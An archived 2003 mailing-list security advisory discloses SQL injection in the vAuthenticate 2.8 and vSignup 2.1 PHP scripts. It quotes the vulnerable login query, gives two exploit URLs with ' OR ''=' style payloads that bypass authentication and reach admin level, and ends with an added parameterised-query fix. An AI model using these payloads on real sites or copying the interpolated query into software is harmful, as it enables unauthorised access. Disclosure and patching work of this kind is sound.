vSignup, vAuthenticate (PHP)

From: Frog Man (leseulfrogat_private)
Date: Tue Jan 14 2003 - 08:38:58 PST


    Information :
    °°°°°°°°°°°°°°
    -----------------------
    Product : vAuthenticate
    Version : 2.8
    -----------------------
    Product : vSignup
    Version : 2.1
    -----------------------
    Website : http://www.beanbug.net
    Problem : SQL Injection
    
    
    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    chgpwd.php :
    -----------------------------------------------
    <?
    	if (!class_exists(auth))
    	{
    		include ("auth.php");
    	}
    		include ("authconfig.php");
    		include ("check.php");
    ?>
    -----------------------------------------------
    
    admin/index.php :
    ------------------------------------------
    <?
    	if (!class_exists(auth))
    	{
    		include ("../auth.php");
    	}
    		include ("../authconfig.php");
    		include ("../check.php");
    
    	if ($check["level"] != 1)
    	{
    ------------------------------------------
    
    
    check.php :
    ------------------------------------------------------------------------
    <?
    	$CheckSecurity = new auth();
    	$check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
    	if ($check == false)
    	{
    		// Feel free to change the error message below. Just make sure you put a "\" before
    		// any double quote.
    		print "<font face=\"Arial, Helvetica, sans-serif\" size=\"5\" color=\"#FF0000\">";
    		print "<b>Illegal Access</b>";
    		print "</font><br>";
    		print "<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"2\" color=\"#000000\">";
    		print "<b>You do not have permission to view this page.</b></font>";
    
    		exit; // End program execution. This will disable continuation of processing the rest of the page.
    	}
    
    ?>
    ------------------------------------------------------------------------
    
    
    
    auth.php :
    ------------------------------------------------------------------------
    function page_check($username, $password) {
    	$query = "SELECT * FROM authuser WHERE uname='$username' AND passwd='$password' AND status <> 'inactive'";
    	$connection = mysql_connect($this->HOST, $this->USERNAME, $this->PASSWORD);
    
    	// OLD CODE - DO NOT REMOVE
    	// $result = mysql_db_query($this->DBNAME, $query);
    
    	// REVISED CODE
    	$SelectedDB = mysql_select_db($this->DBNAME);
    	$result = mysql_query($query);
    
    	$numrows = mysql_num_rows($result);
    	$row = mysql_fetch_array($result);
    
    	// CHECK IF THERE ARE RESULTS
    	// Logic: If the number of rows of the resulting recordset is 0, that means that no
    	// match was found. Meaning, wrong username-password combination.
    	if ($numrows == 0) {
    		return false;
    	}
    	else {
    		return $row;
    	}
    } // End: function page_check
    ------------------------------------------------------------------------
    
    
    
    
    Exploits :
    °°°°°°°°°°
    http://[target]/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='
    
    http://[target]/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1
    
    
    
    Patches :
    °°°°°°°°
    A patch can be found on http://www.phpsecure.org.
    
    
    
    More details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/vAuth-Signup.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
    
    
    frog-m@n
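
A parameterised rewrite of page_check(), added here as an example and not taken from the advisory or from the vAuthenticate/vSignup code: the table and column names come from the query quoted above, the mysqli connection settings and the page_check_safe name are hypothetical.

```php
<?php
// Added example, not vAuthenticate's own code. Instead of interpolating
// $username and $password into the SQL text (the defect in auth.php above),
// both values are bound as parameters, so a value like  ' OR ''='  is sent
// to the server as a literal string and cannot change the WHERE clause.
function page_check_safe(mysqli $db, string $username, string $password)
{
    // Table/column names as in the advisory's query; only the interpolation changes.
    $sql = "SELECT * FROM authuser WHERE uname = ? AND passwd = ? AND status <> 'inactive'";

    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        return false;            // treat a failed prepare as "not authenticated"
    }

    // 'ss' = two string parameters; values never touch the SQL text.
    $stmt->bind_param('ss', $username, $password);
    $stmt->execute();

    $result = $stmt->get_result();     // needs the mysqlnd driver
    $row = $result ? $result->fetch_assoc() : null;
    $stmt->close();

    // Same contract as the original: false when no row matched, the row otherwise,
    // so callers such as admin/index.php ($check["level"] != 1) keep working.
    return $row ?: false;
}

// Hypothetical connection settings. Read the credentials from the request
// explicitly rather than relying on register_globals as check.php does.
$db = new mysqli('localhost', 'authapp', 'db-password', 'authdb');
$check = page_check_safe($db,
                         $_POST['USERNAME'] ?? '',
                         $_POST['PASSWORD'] ?? '');
if ($check === false) {
    http_response_code(403);
    print "<b>Illegal Access</b>";
    exit;
}
```

Storing password hashes and checking them with password_verify() instead of comparing passwd in SQL is a separate improvement the advisory does not cover.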
    
    
    



    This archive was generated by hypermail 2b30 : Mon Jan 20 2003 - 21:54:57 PST